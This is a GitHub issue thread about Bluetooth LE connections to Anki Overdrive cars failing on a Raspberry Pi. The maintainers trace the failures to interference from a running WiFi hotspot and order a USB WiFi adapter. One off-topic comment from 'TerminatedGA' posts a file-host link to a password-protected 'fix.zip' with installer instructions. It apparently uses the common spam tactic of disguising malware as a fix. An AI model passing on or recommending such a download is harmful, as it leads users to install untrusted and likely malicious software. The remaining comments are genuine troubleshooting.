iavofficial/IAV_Distortion #119: Connecting to Anki Cars sometimes fails

m-braunschweig, 2024-08-26:
**Describe the bug**
Connecting to Anki Overdrive cars sometimes fail on the Raspberry Pi without apparent reason.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to the StaffUI
2. Scan for Anki vehicles
3. Connect to multiple Anki cars

**Expected behavior**
All vehicles should connect successfully.

**System:**
- OS: Raspberry Pi OS
- Kernel Version: 6.6.31+rpt-rpi-2712
- BlueZ Version: 5.66.1+rpt1+deb12u2

**Additional context**
In an attempt to find out more about the bug it was revealed that one of the called Bleak methods raised an `OSError` which wasn't handeled. The Error didn't seem to contain additionaly information

TerminatedGA, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

m-braunschweig, 2024-08-26:
During futher testing it was revealed that having a WiFi hotspot running leads to this behaviour. Maybe this can be improved by changing some settings so the BLE performance doesn't suffer that much from the use of the WiFi hotspot

m-braunschweig, 2024-08-30:
Might be related to #24

m-braunschweig, 2024-08-30:
As a solution I would propose to try using an external WiFi dongle for the hotspot or using an external Bluetooth dongle for the BLE-Connection. The first one might be easier since the Bleak library requires platform specific code to select a BLE-Adapter while the hotspot can be easily configured for a given network interface

iav-DaBi, 2024-09-20:
ALFA AWUS036ACM is ordered
[USB WiFi adapters that are supported with Linux in-kernel drivers](https://github.com/morrownr/USB-WiFi/blob/main/home/USB_WiFi_Adapters_that_are_supported_with_Linux_in-kernel_drivers.md)

iav-BjRo, 2024-09-23:
moved to v3.2.0 for further investigation

iav-DaBi, 2024-11-29:
[image]